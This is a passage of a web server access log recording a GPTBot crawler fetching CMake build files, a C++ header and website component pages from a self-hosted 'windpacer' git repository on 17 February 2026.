+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10168] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10296] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12079] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10203] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10266] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10167] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10238] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14919] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10357] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11727] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13636] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11181] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 